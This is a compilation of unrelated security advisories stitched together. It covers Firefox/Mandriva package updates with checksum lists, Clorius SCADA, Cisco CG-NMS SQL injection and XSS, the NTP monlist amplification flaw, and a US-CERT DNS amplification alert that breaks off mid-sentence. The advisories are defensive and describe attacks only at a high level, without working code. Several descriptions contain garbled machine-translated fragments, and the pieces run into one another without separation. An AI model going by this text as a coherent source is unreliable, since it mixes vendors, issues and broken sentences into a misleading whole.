Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-0788.html https://www.redhat.com/security/data/cve/CVE-2013-0793.html https://www.redhat.com/security/data/cve/CVE-2013-0795.html https://www.redhat.com/security/data/cve/CVE-2013-0796.html https://www.redhat.com/security/data/cve/CVE-2013-0800.html https://access.redhat.com/security/updates/classification/#critical http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFRWzt5XlSAg2UNWIIRAobXAJ9/uirvEeOiGpegRbi/Fdtv9BRXUACeMYpK taMjOQZpo7Ea1JPyhBWhy7M= =2sCd -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Note: All issues except CVE-2013-0800 cannot be exploited by a specially-crafted HTML mail message as JavaScript is disabled by default for mail messages. They could be exploited another way in Thunderbird, for example, when viewing the full remote content of an RSS feed. A crafted PNG image could use this flaw to leak data through rendered images drawing from random memory. Security researcher Mariusz Mlynski reported a method to use browser navigations through history to load an arbitrary website with that page&#039;s baseURI property pointing to another site instead of the seemingly loaded one. The user will continue to see the incorrect site in the addressbar of the browser. This allows violation of the browser&#039;s same origin policy and could also lead to privilege escalation and the execution of arbitrary code (CVE-2013-0795). Security researcher miaubiz used the Address Sanitizer tool to discover a crash in WebGL rendering when memory is freed that has not previously been allocated. The resulting crash could be potentially exploitable (CVE-2013-0796). When certain values are passed to it during rendering, Cairo attempts to use negative boundaries or sizes for boxes, leading to a potentially exploitable crash in some instances (CVE-2013-0800). Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code (CVE-2013-0788). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0792 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0793 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0795 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0796 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0788 http://www.mozilla.org/security/announce/2013/mfsa2013-39.html http://www.mozilla.org/security/announce/2013/mfsa2013-38.html http://www.mozilla.org/security/announce/2013/mfsa2013-36.html http://www.mozilla.org/security/announce/2013/mfsa2013-35.html http://www.mozilla.org/security/announce/2013/mfsa2013-31.html http://www.mozilla.org/security/announce/2013/mfsa2013-30.html _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: 0db2c1631a956f6147230a099f1d2d68 mes5/i586/firefox-17.0.5-0.1mdvmes5.2.i586.rpm b6accdf420ac5eb3dbea29d283fff049 mes5/i586/firefox-af-17.0.5-0.1mdvmes5.2.i586.rpm a434d7ee9d360c2b555873e8c93aac2a mes5/i586/firefox-ar-17.0.5-0.1mdvmes5.2.i586.rpm 3b64b73c7cb465fee179b140656a065d mes5/i586/firefox-be-17.0.5-0.1mdvmes5.2.i586.rpm 967b03abad307a338d0709df85e1ec1e mes5/i586/firefox-bg-17.0.5-0.1mdvmes5.2.i586.rpm 715fef97490152afcea942e32d9f8fae mes5/i586/firefox-bn-17.0.5-0.1mdvmes5.2.i586.rpm 46bac62630e189f9d6f7f2d90a5e1c4e mes5/i586/firefox-ca-17.0.5-0.1mdvmes5.2.i586.rpm 64143512420338cc54a073be91ccbf9d mes5/i586/firefox-cs-17.0.5-0.1mdvmes5.2.i586.rpm ba627030e474fb62caf34b2280e2432f mes5/i586/firefox-cy-17.0.5-0.1mdvmes5.2.i586.rpm d2ba69795c243c8aad3e56f1ba3190b4 mes5/i586/firefox-da-17.0.5-0.1mdvmes5.2.i586.rpm 81473710741c44e227e930f512a890d7 mes5/i586/firefox-de-17.0.5-0.1mdvmes5.2.i586.rpm 7d787c3a0eabf7b514083f267037cbdd mes5/i586/firefox-devel-17.0.5-0.1mdvmes5.2.i586.rpm f279d611e9a8233cec0090439e0bbc30 mes5/i586/firefox-el-17.0.5-0.1mdvmes5.2.i586.rpm 5ad88edccb4a8cb75d58464ed2201e2a mes5/i586/firefox-en_GB-17.0.5-0.1mdvmes5.2.i586.rpm 7c2bdafe6cf1219d33df634b40ca7f33 mes5/i586/firefox-eo-17.0.5-0.1mdvmes5.2.i586.rpm 6e8e3cc43e1b5326d886780d5409ff57 mes5/i586/firefox-es_AR-17.0.5-0.1mdvmes5.2.i586.rpm 8608ba9849ea4f56ac60475ccfc3acd7 mes5/i586/firefox-es_ES-17.0.5-0.1mdvmes5.2.i586.rpm b6de17fad95679a08dfc420f51d5e0fa mes5/i586/firefox-et-17.0.5-0.1mdvmes5.2.i586.rpm 7d5281fe391c7bcbc4f49369e00ce6f0 mes5/i586/firefox-eu-17.0.5-0.1mdvmes5.2.i586.rpm dfacd04856fb4529fb0ebdabbad374f9 mes5/i586/firefox-fi-17.0.5-0.1mdvmes5.2.i586.rpm b98f1800a67f8fec9dcbca77edd41ac4 mes5/i586/firefox-fr-17.0.5-0.1mdvmes5.2.i586.rpm eed03047da1e7642f207cb8821dbd95f mes5/i586/firefox-fy-17.0.5-0.1mdvmes5.2.i586.rpm 3f110cc8c73665a709b97bf554b835cc mes5/i586/firefox-ga_IE-17.0.5-0.1mdvmes5.2.i586.rpm 0ad55037b7527a452626a84dade35f56 mes5/i586/firefox-gl-17.0.5-0.1mdvmes5.2.i586.rpm e0272d903a0f8b1c938dded3626ac89a mes5/i586/firefox-gu_IN-17.0.5-0.1mdvmes5.2.i586.rpm 6bdc9c6edcc036122d131b6bf5a341ec mes5/i586/firefox-he-17.0.5-0.1mdvmes5.2.i586.rpm 8fd0ad163782a228e9176f1618dbae2f mes5/i586/firefox-hi-17.0.5-0.1mdvmes5.2.i586.rpm cef589c92b95defd03297a43a4a65e65 mes5/i586/firefox-hu-17.0.5-0.1mdvmes5.2.i586.rpm 6a4e24d1c59f774cab7ea341dedde5e5 mes5/i586/firefox-id-17.0.5-0.1mdvmes5.2.i586.rpm 617d63908bfa91b171a5e40acdfbb058 mes5/i586/firefox-is-17.0.5-0.1mdvmes5.2.i586.rpm 89d72f5231e362ffbcb74c5ebd9d2789 mes5/i586/firefox-it-17.0.5-0.1mdvmes5.2.i586.rpm 46e283185529cf7e3b55208e928d3e21 mes5/i586/firefox-ja-17.0.5-0.1mdvmes5.2.i586.rpm 9cb48d986cb94e843740461ccdc7e344 mes5/i586/firefox-kn-17.0.5-0.1mdvmes5.2.i586.rpm b4a30b6ae86cf07f9e15a5921ccf367c mes5/i586/firefox-ko-17.0.5-0.1mdvmes5.2.i586.rpm 447af559ce4a0a7cd0ff00ad81466966 mes5/i586/firefox-ku-17.0.5-0.1mdvmes5.2.i586.rpm f16fa703cc4611f42ef618a2709467ce mes5/i586/firefox-lt-17.0.5-0.1mdvmes5.2.i586.rpm f2f05879c892085be5d0fa4e9c787ae7 mes5/i586/firefox-lv-17.0.5-0.1mdvmes5.2.i586.rpm f166cef7eeae485e939a9964df355ffe mes5/i586/firefox-mk-17.0.5-0.1mdvmes5.2.i586.rpm a2d9533d98cd613ff49ace2dd3c4aaaf mes5/i586/firefox-mr-17.0.5-0.1mdvmes5.2.i586.rpm 04e604773ab19ad5060c53d906c7d222 mes5/i586/firefox-nb_NO-17.0.5-0.1mdvmes5.2.i586.rpm ea691e1ecd5cfac906a077614841100f mes5/i586/firefox-nl-17.0.5-0.1mdvmes5.2.i586.rpm 0b7dac86ef507b78504a6f507d2b82b6 mes5/i586/firefox-nn_NO-17.0.5-0.1mdvmes5.2.i586.rpm b5a1616579bd3804eb500a75aa9b040e mes5/i586/firefox-pa_IN-17.0.5-0.1mdvmes5.2.i586.rpm abca5b749f468af02e0d94e2c8b00ac1 mes5/i586/firefox-pl-17.0.5-0.1mdvmes5.2.i586.rpm 2585fe186ebb3b81ae4e3b4c4ed73442 mes5/i586/firefox-pt_BR-17.0.5-0.1mdvmes5.2.i586.rpm 416bbd1fc256861429b3fd78f7d83ef1 mes5/i586/firefox-pt_PT-17.0.5-0.1mdvmes5.2.i586.rpm 3d66426c2548c0ba2746c4c36a9db708 mes5/i586/firefox-ro-17.0.5-0.1mdvmes5.2.i586.rpm ae4fc0951b14c00d6656540e7d38e22e mes5/i586/firefox-ru-17.0.5-0.1mdvmes5.2.i586.rpm d323216cc380f286ff0c990062cdbd43 mes5/i586/firefox-si-17.0.5-0.1mdvmes5.2.i586.rpm a0edc229b50354a66d6c6152fc082395 mes5/i586/firefox-sk-17.0.5-0.1mdvmes5.2.i586.rpm 7d5edda5ddd9064dec3b85ecc7102f19 mes5/i586/firefox-sl-17.0.5-0.1mdvmes5.2.i586.rpm 277d4c09d495b4b8bb0c7e715761f267 mes5/i586/firefox-sq-17.0.5-0.1mdvmes5.2.i586.rpm 3d601400d0df895c73a5ebb064f4f016 mes5/i586/firefox-sr-17.0.5-0.1mdvmes5.2.i586.rpm f5f9e7bbe47f6fba7042f2bf5a61d28e mes5/i586/firefox-sv_SE-17.0.5-0.1mdvmes5.2.i586.rpm ec8dc022734c08dab5183405efa6d0c1 mes5/i586/firefox-te-17.0.5-0.1mdvmes5.2.i586.rpm 242b490062337f7f4f4b8169fb8c91d5 mes5/i586/firefox-th-17.0.5-0.1mdvmes5.2.i586.rpm 3f2fe42cd27e1c751513a561df7fb5a7 mes5/i586/firefox-tr-17.0.5-0.1mdvmes5.2.i586.rpm e5a6d7e6b9981687ca062526a14c7056 mes5/i586/firefox-uk-17.0.5-0.1mdvmes5.2.i586.rpm 8ad451f2a167af24160826bb6d054593 mes5/i586/firefox-zh_CN-17.0.5-0.1mdvmes5.2.i586.rpm 3d1c7ee791874a416ed2bf5847fa6ad7 mes5/i586/firefox-zh_TW-17.0.5-0.1mdvmes5.2.i586.rpm 0c338be36acdbe8c79655cfeac88627a mes5/i586/icedtea-web-1.3.1-0.3mdvmes5.2.i586.rpm 807123e3063f730d05282bf43f3dda6a mes5/i586/icedtea-web-javadoc-1.3.1-0.3mdvmes5.2.i586.rpm 7380860d463c5b198f74b592e51031f1 mes5/i586/libnspr4-4.9.6-0.1mdvmes5.2.i586.rpm 58137e16b3eb8e9655ceef99f4ec1fc7 mes5/i586/libnspr-devel-4.9.6-0.1mdvmes5.2.i586.rpm 6cb4ca4131bce6f48ff8d347ded8236d mes5/i586/libxulrunner17.0.5-17.0.5-0.1mdvmes5.2.i586.rpm 5c7ea7a5a52630606b7e71d61ac5c738 mes5/i586/libxulrunner-devel-17.0.5-0.1mdvmes5.2.i586.rpm 41f2f6022487aabc48b573620111b6b8 mes5/i586/xulrunner-17.0.5-0.1mdvmes5.2.i586.rpm 2a3a774ee0094a48cf108ed120ba227a mes5/SRPMS/firefox-17.0.5-0.1mdvmes5.2.src.rpm 58a810253d11b6af76cf1bcce6a3e7b4 mes5/SRPMS/firefox-l10n-17.0.5-0.1mdvmes5.2.src.rpm 5add3a80120b73f5ed97c9dd02837c58 mes5/SRPMS/icedtea-web-1.3.1-0.3mdvmes5.2.src.rpm 6d70b7e57cc741f0b587a1effee81fb4 mes5/SRPMS/nspr-4.9.6-0.1mdvmes5.2.src.rpm d7f835773038004ff8995ef676f8397e mes5/SRPMS/xulrunner-17.0.5-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 352b4b9c3ec49226611acfff2586132d mes5/x86_64/firefox-17.0.5-0.1mdvmes5.2.x86_64.rpm 29388b8d4da203e932710f8b98630932 mes5/x86_64/firefox-af-17.0.5-0.1mdvmes5.2.x86_64.rpm 35c9f59f4ce87eb7c64b89e60220ebb3 mes5/x86_64/firefox-ar-17.0.5-0.1mdvmes5.2.x86_64.rpm 204c1013d7e6d3925a73ff3c62ce6c14 mes5/x86_64/firefox-be-17.0.5-0.1mdvmes5.2.x86_64.rpm 43fdfdbedaf5a13fe6396775731a1835 mes5/x86_64/firefox-bg-17.0.5-0.1mdvmes5.2.x86_64.rpm d800fa786bef5538692c6b8fffb2f1b3 mes5/x86_64/firefox-bn-17.0.5-0.1mdvmes5.2.x86_64.rpm 74cb34c33f9d0f070338dd49332bbdd1 mes5/x86_64/firefox-ca-17.0.5-0.1mdvmes5.2.x86_64.rpm fca54be2cf51319542bca20cedf9dff6 mes5/x86_64/firefox-cs-17.0.5-0.1mdvmes5.2.x86_64.rpm 10b6de867fa24ab60c419fd9b314723c mes5/x86_64/firefox-cy-17.0.5-0.1mdvmes5.2.x86_64.rpm eb67b095d7490b5bc24c85bc8652fed9 mes5/x86_64/firefox-da-17.0.5-0.1mdvmes5.2.x86_64.rpm 7761e055af6b87172b2a05f9dc671d99 mes5/x86_64/firefox-de-17.0.5-0.1mdvmes5.2.x86_64.rpm b4ede22d5b768e082d47d2702fb71221 mes5/x86_64/firefox-devel-17.0.5-0.1mdvmes5.2.x86_64.rpm a359d0468b6217c59eb88771f2e799b2 mes5/x86_64/firefox-el-17.0.5-0.1mdvmes5.2.x86_64.rpm 4e58ae7627f5d6d0ba4d7c215c252611 mes5/x86_64/firefox-en_GB-17.0.5-0.1mdvmes5.2.x86_64.rpm 777062d66c8b57c59dc72c60bcade5aa mes5/x86_64/firefox-eo-17.0.5-0.1mdvmes5.2.x86_64.rpm c2b069c9c0105d85c5946f542204a7c7 mes5/x86_64/firefox-es_AR-17.0.5-0.1mdvmes5.2.x86_64.rpm 2a39a098a5b39dee19347f18c033f8c5 mes5/x86_64/firefox-es_ES-17.0.5-0.1mdvmes5.2.x86_64.rpm 412516e1b5a4b4b8b3a7eaf8d2b7806e mes5/x86_64/firefox-et-17.0.5-0.1mdvmes5.2.x86_64.rpm 5225e8ac59ee14a9fe5653e8afaa96b4 mes5/x86_64/firefox-eu-17.0.5-0.1mdvmes5.2.x86_64.rpm e91755da5dc3a6481ef5fd87b66dc2b3 mes5/x86_64/firefox-fi-17.0.5-0.1mdvmes5.2.x86_64.rpm 6c3c9ffddeb301345539516a2128870b mes5/x86_64/firefox-fr-17.0.5-0.1mdvmes5.2.x86_64.rpm f90bff71593d02e29a6801fb30196522 mes5/x86_64/firefox-fy-17.0.5-0.1mdvmes5.2.x86_64.rpm e36128274f24c1e3a905c6834dbd3431 mes5/x86_64/firefox-ga_IE-17.0.5-0.1mdvmes5.2.x86_64.rpm c1d8d7d3060a4a63ecf56e516d704322 mes5/x86_64/firefox-gl-17.0.5-0.1mdvmes5.2.x86_64.rpm fce3e57a97a18461e6784f27c9b5f982 mes5/x86_64/firefox-gu_IN-17.0.5-0.1mdvmes5.2.x86_64.rpm d567bdbe94970ce762fbbec34566271e mes5/x86_64/firefox-he-17.0.5-0.1mdvmes5.2.x86_64.rpm 68a74e20c4ee64127e275d443052a0aa mes5/x86_64/firefox-hi-17.0.5-0.1mdvmes5.2.x86_64.rpm 65eeb5076b7e049d2212f88e8e3a5d2b mes5/x86_64/firefox-hu-17.0.5-0.1mdvmes5.2.x86_64.rpm 7906c9372d2db0981a0f1fc5d068781f mes5/x86_64/firefox-id-17.0.5-0.1mdvmes5.2.x86_64.rpm 39174043fdecada0715aae758b111931 mes5/x86_64/firefox-is-17.0.5-0.1mdvmes5.2.x86_64.rpm 391b93959169588a74801efb2baeb048 mes5/x86_64/firefox-it-17.0.5-0.1mdvmes5.2.x86_64.rpm de1e0b1e3b0e2c1b91b3b9d8250b042d mes5/x86_64/firefox-ja-17.0.5-0.1mdvmes5.2.x86_64.rpm c465364f97f2c2cb891ff5866f7b2048 mes5/x86_64/firefox-kn-17.0.5-0.1mdvmes5.2.x86_64.rpm dd25c3ffde3ac083a3bd439855ab9e66 mes5/x86_64/firefox-ko-17.0.5-0.1mdvmes5.2.x86_64.rpm 0af917c3141a800843563b56e634e4b9 mes5/x86_64/firefox-ku-17.0.5-0.1mdvmes5.2.x86_64.rpm d17896516e04d7b2483c449c07018c1a mes5/x86_64/firefox-lt-17.0.5-0.1mdvmes5.2.x86_64.rpm e7925f0f39dd9cc0be8e390ff5b2511a mes5/x86_64/firefox-lv-17.0.5-0.1mdvmes5.2.x86_64.rpm aa7dada147bc0ee6e14de44582148245 mes5/x86_64/firefox-mk-17.0.5-0.1mdvmes5.2.x86_64.rpm 12eeadd008b58a4c51c396a3296c6876 mes5/x86_64/firefox-mr-17.0.5-0.1mdvmes5.2.x86_64.rpm 6043540a8e8edd39b06c8dbde4bbac6a mes5/x86_64/firefox-nb_NO-17.0.5-0.1mdvmes5.2.x86_64.rpm 0967142165225c2d0cde356bdf91af38 mes5/x86_64/firefox-nl-17.0.5-0.1mdvmes5.2.x86_64.rpm fe4d07e0a85ee4cf0a3ed65c4a24e561 mes5/x86_64/firefox-nn_NO-17.0.5-0.1mdvmes5.2.x86_64.rpm 18c355a3a4ecbed10dd933a2c0cee658 mes5/x86_64/firefox-pa_IN-17.0.5-0.1mdvmes5.2.x86_64.rpm fdb47ab94213fde94caca5c0e956ad0a mes5/x86_64/firefox-pl-17.0.5-0.1mdvmes5.2.x86_64.rpm 26659783f49eb63504f8240af15c46ef mes5/x86_64/firefox-pt_BR-17.0.5-0.1mdvmes5.2.x86_64.rpm 003887926df53eea9cd2c728ce2f2613 mes5/x86_64/firefox-pt_PT-17.0.5-0.1mdvmes5.2.x86_64.rpm f26a734cc64f5630d5763501789af036 mes5/x86_64/firefox-ro-17.0.5-0.1mdvmes5.2.x86_64.rpm 2055c8a4b5ab208de8bb7fc03df6f6ad mes5/x86_64/firefox-ru-17.0.5-0.1mdvmes5.2.x86_64.rpm eb5a279167efdded2ec946f1174885da mes5/x86_64/firefox-si-17.0.5-0.1mdvmes5.2.x86_64.rpm 0884722ce24c5dc947a1693b72ab87a8 mes5/x86_64/firefox-sk-17.0.5-0.1mdvmes5.2.x86_64.rpm 9ec578bd6111680976755026eee9736f mes5/x86_64/firefox-sl-17.0.5-0.1mdvmes5.2.x86_64.rpm d3ed346a9201d1c43ec0addd91404407 mes5/x86_64/firefox-sq-17.0.5-0.1mdvmes5.2.x86_64.rpm 7a3c688c303f03f13d370e078ef527d8 mes5/x86_64/firefox-sr-17.0.5-0.1mdvmes5.2.x86_64.rpm 679acfed547f9ed80a7515a4ac955990 mes5/x86_64/firefox-sv_SE-17.0.5-0.1mdvmes5.2.x86_64.rpm 94bf66782b9ffd747482d41526527b5f mes5/x86_64/firefox-te-17.0.5-0.1mdvmes5.2.x86_64.rpm 9b37e1edaa79527f9bb7159e39be108c mes5/x86_64/firefox-th-17.0.5-0.1mdvmes5.2.x86_64.rpm 2a6557c6d334dc4020f3cd2ba2235a0d mes5/x86_64/firefox-tr-17.0.5-0.1mdvmes5.2.x86_64.rpm c95479524cf439150d838ecd163e7040 mes5/x86_64/firefox-uk-17.0.5-0.1mdvmes5.2.x86_64.rpm aa31ef1321eff4e86d98acfac020fb25 mes5/x86_64/firefox-zh_CN-17.0.5-0.1mdvmes5.2.x86_64.rpm d539dfb331ec70a69828f7665686d9b0 mes5/x86_64/firefox-zh_TW-17.0.5-0.1mdvmes5.2.x86_64.rpm 2028cbbf55353a75366c9cb191efd67c mes5/x86_64/icedtea-web-1.3.1-0.3mdvmes5.2.x86_64.rpm 734ae27edc8c1026bca9947d70fd3fb7 mes5/x86_64/icedtea-web-javadoc-1.3.1-0.3mdvmes5.2.x86_64.rpm be78699f862f4a1d199248510e20ce1b mes5/x86_64/lib64nspr4-4.9.6-0.1mdvmes5.2.x86_64.rpm f62ab4de8ca959c4ff3990c92ea2427b mes5/x86_64/lib64nspr-devel-4.9.6-0.1mdvmes5.2.x86_64.rpm e94bbf818cfa59f67f7e5e75daf2726d mes5/x86_64/lib64xulrunner17.0.5-17.0.5-0.1mdvmes5.2.x86_64.rpm aecb7c59434a3330e7cb64bb6e7d902c mes5/x86_64/lib64xulrunner-devel-17.0.5-0.1mdvmes5.2.x86_64.rpm 531f21b03dbffa6024943663c1ba9e64 mes5/x86_64/xulrunner-17.0.5-0.1mdvmes5.2.x86_64.rpm 2a3a774ee0094a48cf108ed120ba227a mes5/SRPMS/firefox-17.0.5-0.1mdvmes5.2.src.rpm 58a810253d11b6af76cf1bcce6a3e7b4 mes5/SRPMS/firefox-l10n-17.0.5-0.1mdvmes5.2.src.rpm 5add3a80120b73f5ed97c9dd02837c58 mes5/SRPMS/icedtea-web-1.3.1-0.3mdvmes5.2.src.rpm 6d70b7e57cc741f0b587a1effee81fb4 mes5/SRPMS/nspr-4.9.6-0.1mdvmes5.2.src.rpm d7f835773038004ff8995ef676f8397e mes5/SRPMS/xulrunner-17.0.5-0.1mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFRZBk1mqjQ0CJFipgRAplSAJ44faYKLDitsBC24gBnRhdQycVEmgCgq1FV wMd/SGhxwMMZZ8YXJEH7z9g= =83zI -----END PGP SIGNATURE-----

Clorius Controls ICS SCADA fails to properly restrict access to the /html/info.html URL, allowing remote attackers to exploit the vulnerability to directly submit requests for internal IP addresses, MAC addresses, and firmware version information. Clorius Controls ICS SCADA is an industrial control system software. An information disclosure vulnerability exists in Clorius Controls ICS SCADA. Attackers use this vulnerability to gain potentially sensitive information

Multiple SQL injection vulnerabilities in the device-management implementation in Cisco Connected Grid Network Management System (CG-NMS) allow remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug IDs CSCue14553 and CSCue38746. Vendors have confirmed this vulnerability Bug ID CSCue14553 , CSCue38746 It is released as.By any third party SQL The command may be executed. An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database

Multiple cross-site scripting (XSS) vulnerabilities in the element-list implementation in Cisco Connected Grid Network Management System (CG-NMS) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCue14517, CSCue38914, CSCue38884, CSCue38882, CSCue38881, CSCue38872, CSCue38868, CSCue38866, CSCue38853, and CSCue14540. Vendors have addressed this vulnerability Bug ID CSCue14517 , CSCue38914 , CSCue38884 , CSCue38882 , CSCue38881 , CSCue38872 , CSCue38868 , CSCue38866 , CSCue38853 , CSCue14540 It is released as.By any third party Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues are being tracked by Cisco Bug IDs CSCue14517, CSCue38914, CSCue38884, CSCue38882, CSCue38881, CSCue38872, CSCue38868, CSCue38866, CSCue38853, and CSCue14540

The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. UDP protocols such as NTP can be abused to amplify denial-of-service attack traffic. Servers running the network time protocol (NTP) based on implementations of ntpd prior to version 4.2.7p26 that use the default unrestricted query configuration are susceptible to a reflected denial-of-service (DRDoS) attack. Other proprietary NTP implementations may also be affected. Multiple broadband routers contain an issue where they may behave as open resolvers. A device that runs as a DNS cache server, which responds to any recursive DNS queries that are received is referred to as an open resolver. Multiple broadband routers may contain an issue where they may behave as open resolvers. This issue was confirmed by JPCERT/CC and IPA that it affected multiple developers and was coordinated by JPCERT/CC. In addition, Yasuhiro Orange Morishita of Japan Registry Services Co., Ltd. (JPRS) reported this vulnerability to JPCERT/CC under the Information Security Early Warning Partnership.The device may be used in a DNS amplification attack and unknowingly become a part of a DDoS attack. NTP is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users. The net-misc/ntp package contains the official reference implementation by the NTP Project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/ntp < 4.2.6_p5-r10 >= 4.2.6_p5-r10 Description =========== ntpd is susceptible to a reflected Denial of Service attack. Please review the CVE identifiers and references below for details. Workaround ========== We modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10 and added "noquery" to the default restriction which disallows anyone to query the ntpd status, including "monlist". If you use a non-default configuration, and provide a ntp service to untrusted networks, we highly recommend you to revise your configuration to disable mode 6 and 7 queries for any untrusted (public) network. You can always enable these queries for specific trusted networks. For more details please see the "Access Control Support" chapter in the ntp.conf(5) man page. Resolution ========== All NTP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.6_p5-r10" Note that the updated package contains a modified default configuration only. References ========== [ 1 ] CVE-2013-5211 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5211 [ 2 ] VU#348126 http://www.kb.cert.org/vuls/id/348126 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201401-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System TA13-088A: DNS Amplification Attacks Original release date: March 29, 2013 Systems Affected * Domain Name System (DNS) servers Overview A Domain Name Server (DNS) Amplification attack is a popular form of Distributed Denial of Service (DDoS) that relies on the use of publically accessible open recursive DNS servers to overwhelm a victim system with DNS response traffic. Description A Domain Name Server (DNS) Amplification attack is a popular form of Distributed Denial of Service (DDoS) that relies on the use of publically accessible open recursive DNS servers to overwhelm a victim system with DNS response traffic. The basic attack technique consists of an attacker sending a DNS name lookup request to an open recursive DNS server with the source address spoofed to be the victims address. When the DNS server sends the DNS record response, it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim. By leveraging a botnet to perform additional spoofed DNS queries, an attacker can produce an overwhelming amount of traffic with little effort. Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks. While the attacks are difficult to prevent, network operators can implement several possible mitigation strategies. The primary element in the attack that is the focus of an effective long-term solution is the detection and elimination of open recursive DNS resolvers. These systems are typically legitimate DNS servers that have been improperly configured to respond to recursive queries on behalf of any system, rather than restricting recursive responses only to requests from local or authorized clients. By identifying these systems, an organization or network operator can reduce the number of potential resources that the attacker can employ in an attack. Impact A misconfigured Domain Name System (DNS) server can be exploited to participate in a Distributed Denial of Service (DDoS) attack. Solution DETECTION Several organizations offer free, web-based scanning tools that will search a network for vulnerable open DNS resolvers. These tools will scan entire network ranges and list the address of any identified open resolvers. The query interface allows network administrators to enter IP ranges in CIDR format [1]. The Measurement Factory http://dns.measurement-factory.com Like the Open DNS Resolver Project, the Measurement Factory maintains a list of Internet accessible DNS servers and allows administrators to search for open recursive resolvers [2]. In addition, the Measurement Factory offers a free tool to directly test an individual DNS resolver to determine if it allows open recursion. This will allow an administrator to determine if configuration changes are necessary and verify that configuration changes have been effective [3]. Finally, the site offers statistics showing the number of open resolvers detected on the various Autonomous System (AS) networks, sorted by the highest number found [4]. DNSInspect http://www.dnsinspect.com Another freely available, web-based tool for testing DNS resolvers is DNSInspect. This site is similar to The Measurement Factorys ability to test a specific resolver for vulnerability, but offers the ability to test an entire DNS Zone for several other potential configuration and security issues [5]. Indicators In a typical recursive DNS query, a client sends a query request to a local DNS server requesting the resolution of a name or the reverse resolution of an IP address. The DNS server performs the necessary queries on behalf of the client and returns a response packet with the requested information or an error [6, page 21]. The specification does not allow for unsolicited responses. In a DNS amplification attack, the key indicator is a query response without a matching request. MITIGATION Unfortunately, due to the overwhelming traffic volume that can be produced by one of these attacks, there is often little that the victim can do to counter a large-scale DNS amplification-based distributed denial-of-service attack. While the only effective means of eliminating this type of attack is to eliminate open recursive resolvers, this requires a large-scale effort by numerous parties. According to the Open DNS Resolver Project, of the 27 million known DNS resolvers on the Internet, approximately 25 million pose a significant threat of being used in an attack [1]. However, several possible techniques are available to reduce the overall effectiveness of such attacks to the Internet community as a whole. Where possible, configuration links have been provided to assist administrators with making the recommended changes. The configuration information has been limited to BIND9 and Microsofts DNS Server, which are two widely deployed DNS servers. If you are running a different DNS server, please see your vendors documentation for configuration details. Source IP Verification Because the DNS queries being sent by the attacker-controlled clients must have a source address spoofed to appear as the victims system, the first step to reducing the effectiveness of DNS amplification is for Internet Service Providers to deny any DNS traffic with spoofed addresses. The Network Working Group of the Internet Engineering Task Force released a Best Current Practice document in May 2000 that describes how an Internet Service Provider can filter network traffic on their network to drop packets with source addresses not reachable via the actual packets path [7]. This configuration change would considerably reduce the potential for most current types of DDoS attacks. Disabling Recursion on Authoritative Name Servers Many of the DNS servers currently deployed on the Internet are exclusively intended to provide name resolution for a single domain. These systems do not need to support resolution of other domains on behalf of a client, and therefore should be configured with recursion disabled. Bind9 Add the following to the global options [8]: options { allow-query-cache { none; }; recursion no; }; Microsoft DNS Server In the Microsoft DNS console tool [9]: * Right-click the DNS server and click Properties. * Click the Advanced tab. * In Server options, select the Disable 